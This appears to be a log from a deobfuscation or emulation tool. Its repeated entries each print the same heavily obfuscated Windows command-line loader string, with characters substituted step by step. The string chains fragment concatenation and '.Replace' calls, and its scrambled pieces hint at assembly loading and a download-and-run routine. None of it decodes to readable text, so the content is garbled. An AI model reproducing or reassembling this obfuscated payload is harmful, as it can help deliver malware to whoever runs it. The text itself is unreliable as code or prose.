seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zEhETdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys80,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g90,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7gYZn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy8080zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)*jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aEgY-3QI9an37gYjUn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy8080Ajh7yjUaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'jUn'+'90('+'Pjy)'+')').Rek7yla7yjUaE1'9a7'axd{s%RInaEPjy{7yjUa%zEhA]Pjy#H).Rek7yla7yjUaE11{7yjUa%zEhA]Pjy9iy+{7yjUa%zEhA]Pjyiy#+{7yjUa%zEhA]PjyjUn06)axd{s%RInaEPjy{7yjUa%zEhA]PjyjUn2H).Rek7yla7yjUaE11{7yjUa%zEhA]PjyjUnjUniy+{7yjUa%zEhA]Pjy5H+{7yjUa%zEhA]PjyiyjUn)axd{s%RInaEPjy{7yjUa%zEhA]Pjy#6))^&^&gYse%gYgYajUI/`aKE,%zEhPjgY1gZgYFl6aRIA3QI9le80e*XbGC7y).7yaTdvE.InFl6PjQIE7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y80s3Td]7y).Fl6aTd3egYgY)gYgY^^^|GC7yyPj4ERsheZ7yElTdgYgY-nXqFl6NZqFl6N%E]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zEhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzEhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y807yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7EgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = @#?., result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{jUnPjy+@s%zEhETdlI37{jUn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl] jh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys80,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g90,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl] u`'+'GC7y'+'e{Pjy '+'2jUnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7 Zn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy8080zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)*jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aE -3QI9an37 jUn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy8080Ajh7yjUaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'jUn'+'90('+'Pjy)'+')').Rek7yla7yjUaE1'9a7'axd{s%RInaEPjy{7yjUa%zEhA]Pjy#H).Rek7yla7yjUaE11{7yjUa%zEhA]Pjy9iy+{7yjUa%zEhA]Pjyiy#+{7yjUa%zEhA]PjyjUn06)axd{s%RInaEPjy{7yjUa%zEhA]PjyjUn2H).Rek7yla7yjUaE11{7yjUa%zEhA]PjyjUnjUniy+{7yjUa%zEhA]Pjy5H+{7yjUa%zEhA]PjyiyjUn)axd{s%RInaEPjy{7yjUa%zEhA]Pjy#6))^&^& se% ajUI/`aKE,%zEhPj 1gZ Fl6aRIA3QI9le80e*XbGC7y).7yaTdvE.InFl6PjQIE7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11Tdjh eqFl6N7y80s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yjUa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7e,v%IPjqFl6Nk7yPjTdI, 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yjUaPjmuQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y807yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& ,m37.e7E ,g, oa37Z/Tgo True 1
Fn
Get Environment String name = '}_-, result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{jUnPjy+@s%zEhETdlI37{jUn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl] jh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g90,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl] u`'+'GC7y'+'e{Pjy '+'2jUnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7 Zn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)*jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aE -3QI9an37 jUn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy::Ajh7yjUaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'jUn'+'90('+'Pjy)'+')').Rek7yla7yjUaE1'9a7'axd{s%RInaEPjy{7yjUa%zEhA]Pjy#H).Rek7yla7yjUaE11{7yjUa%zEhA]Pjy9iy+{7yjUa%zEhA]Pjyiy#+{7yjUa%zEhA]PjyjUn06)axd{s%RInaEPjy{7yjUa%zEhA]PjyjUn2H).Rek7yla7yjUaE11{7yjUa%zEhA]PjyjUnjUniy+{7yjUa%zEhA]Pjy5H+{7yjUa%zEhA]PjyiyjUn)axd{s%RInaEPjy{7yjUa%zEhA]Pjy#6))^&^& se% ajUI/`aKE,%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTdvE.InFl6PjQIE7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yjUa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7e,v%IPjqFl6Nk7yPjTdI, 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yjUaPjmuQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& ,m37.e7E ,g, oa37Z/Tgo True 1
Fn
Get Environment String name = ;], result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.u'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g90,gFlDn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl] u`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7 Zn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7'axd{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy9iy+{7yDa%zEhA]Pjyiy#+{7yDa%zEhA]PjyDn06)axd{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDniy+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]PjyiyDn)axd{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKE,%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTdvE.InFl6PjQIE7yDaXmuQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7e,v%IPjqFl6Nk7yPjTdI, 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmuQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& ,m37.e7E ,g, oa37Z/Tgo True 1
Fn
Get Environment String name = `\+, result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.u'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl] u`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'k7yuuQI7 Zn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'ncX37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7'axd{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy9iy+{7yDa%zEhA]Pjyiy#+{7yDa%zEhA]PjyDn06)axd{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDniy+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]PjyiyDn)axd{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTdvE.InFl6PjQIE7yDaXmuQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecv%IPjqFl6Nk7yPjTdIc 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmuQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yyec{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = _@.-, result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.u'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl] u`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'k7yuuQI7 Zn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H28+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'ncX37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7'axd{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy98+{7yDa%zEhA]Pjy8#+{7yDa%zEhA]PjyDn06)axd{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDn8+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]Pjy8Dn)axd{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTdvE.InFl6PjQIE7yDaXmuQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecv%IPjqFl6Nk7yPjTdIc 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmuQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yyec{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = $', result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yBBQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.B'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGC7y2BQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yBBQI'+'mQIaKFl] B`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'k7yBBQI7 Zn10..H'+'2('+'))\Fl66k7yBBQI'+'GC7y'+'GC7yaKFl66k7yBBQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yBBQI7axd'+'Fl6'+'6k7yBBQI_'+')[Fl66k7yBBQImQI'+'{Fl66k7yBBQI'+'_*H28+Fl66k7yBBQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yBBQIGC7yGC7y.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yBBQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'ncX37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7'axd{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy98+{7yDa%zEhA]Pjy8#+{7yDa%zEhA]PjyDn06)axd{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDn8+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]Pjy8Dn)axd{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTdvE.InFl6PjQIE7yDaXmBQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecv%IPjqFl6Nk7yPjTdIc 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yyec{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = .,`_, result_out = seGC7y suTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yBBQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.B'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGC7y2BQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yBBQI'+'mQIaKFl] B`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'k7yBBQI7 Zn10..H'+'2('+'))\Fl66k7yBBQI'+'GC7y'+'GC7yaKFl66k7yBBQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yBBQI7axd'+'Fl6'+'6k7yBBQI_'+')[Fl66k7yBBQImQI'+'{Fl66k7yBBQI'+'_*H28+Fl66k7yBBQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yBBQIGC7yGC7y.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yBBQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'ncX37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7'axd{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy98+{7yDa%zEhA]Pjy8#+{7yDa%zEhA]PjyDn06)axd{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDn8+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]Pjy8Dn)axd{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTduE.InFl6PjQIE7yDaXmBQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6Nk7yPjTdIc 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yyec{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yu% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = ',`+, result_out = seGC7y suTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yBBQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.B'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGC7y2BQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yBBQI'+'mQIaKFl] B`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'k7yBBQI7 Zn10..H'+'2('+'))\Fl66k7yBBQI'+'GC7y'+'GC7yaKFl66k7yBBQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yBBQI7,'+'Fl6'+'6k7yBBQI_'+')[Fl66k7yBBQImQI'+'{Fl66k7yBBQI'+'_*H28+Fl66k7yBBQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yBBQIGC7yGC7y.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yBBQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'ncX37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7',{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy98+{7yDa%zEhA]Pjy8#+{7yDa%zEhA]PjyDn06),{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDn8+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]Pjy8Dn),{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTduE.InFl6PjQIE7yDaXmBQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6Nk7yPjTdIc 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yyec{H,2H,25Pjy-TdQXIn'')1@Znk7yu% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
